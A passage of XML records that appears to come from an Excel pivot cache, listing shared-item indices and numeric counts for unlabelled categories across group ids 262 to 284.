  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="262"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="262"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="262"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="30"/>
    <x v="262"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="263"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="263"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="263"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="263"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="263"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="263"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="263"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="263"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="263"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="263"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="263"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="263"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="263"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="263"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="264"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="264"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="264"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="264"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="264"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="264"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="264"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="264"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="264"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="264"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="264"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="264"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="264"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="7"/>
    <x v="264"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="265"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="265"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="265"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="265"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="14"/>
    <x v="265"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="265"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="24"/>
    <x v="265"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="265"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="265"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="265"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="265"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="265"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="265"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="265"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="266"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="266"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="266"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="266"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="266"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="266"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="266"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="266"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="266"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="266"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="266"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="266"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="266"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="266"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="267"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="267"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="267"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="267"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="267"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="267"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="267"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="267"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="267"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="267"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="267"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="267"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="267"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="267"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="268"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="268"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="268"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="268"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="268"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="268"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="268"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="268"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="268"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="268"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="268"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="268"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="268"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="268"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="269"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="269"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="269"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="269"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="269"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="269"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="269"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="269"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="269"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="269"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="269"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="269"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="269"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="269"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="270"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="270"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="270"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="270"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="270"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="270"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="270"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="270"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="270"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="270"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="270"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="270"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="270"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="270"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="271"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="271"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="271"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="271"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="272"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="272"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="272"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="272"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="272"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="272"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="234"/>
    <x v="272"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="272"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="272"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="272"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="140"/>
    <x v="272"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="272"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="272"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="24"/>
    <x v="272"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="273"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="273"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="273"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="273"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="55"/>
    <x v="273"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="273"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="273"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="273"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="18"/>
    <x v="273"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="12"/>
    <x v="273"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="39"/>
    <x v="273"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="79"/>
    <x v="273"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="273"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="273"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="274"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="274"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="274"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="274"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="274"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="274"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="274"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="274"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="274"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="274"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="274"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="274"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="274"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="274"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="275"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="275"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="275"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="275"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="276"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="276"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="276"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="276"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="276"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="276"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="276"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="276"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="276"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="276"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="276"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="276"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="276"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="276"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="277"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="277"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="277"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="277"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="277"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="277"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="277"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="277"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="277"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="277"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="277"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="277"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="277"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="277"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="278"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="278"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="278"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="278"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="278"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="278"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="278"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="278"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="278"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="278"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="278"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="278"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="278"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="278"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="279"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="279"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="279"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="279"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="279"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="279"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="279"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="279"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="279"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="279"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="279"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="279"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="279"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="279"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="280"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="280"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="280"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="280"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="280"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="280"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="280"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="280"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="280"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="280"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="280"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="98"/>
    <x v="280"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="280"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="280"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="4"/>
    <x v="281"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="281"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="281"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="281"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="97"/>
    <x v="281"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="68"/>
    <x v="281"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="281"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="281"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="12"/>
    <x v="281"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="281"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="281"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="281"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="281"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="281"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="282"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="282"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="282"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="282"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="282"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="282"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="282"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="282"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="282"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="282"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="282"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="282"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="282"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="282"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="3"/>
    <x v="283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="45"/>
    <x v="283"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="60"/>
    <x v="283"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="283"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="283"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="24"/>
    <x v="283"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="93"/>
    <x v="283"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="283"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="283"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="284"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="284"/>
  </r>
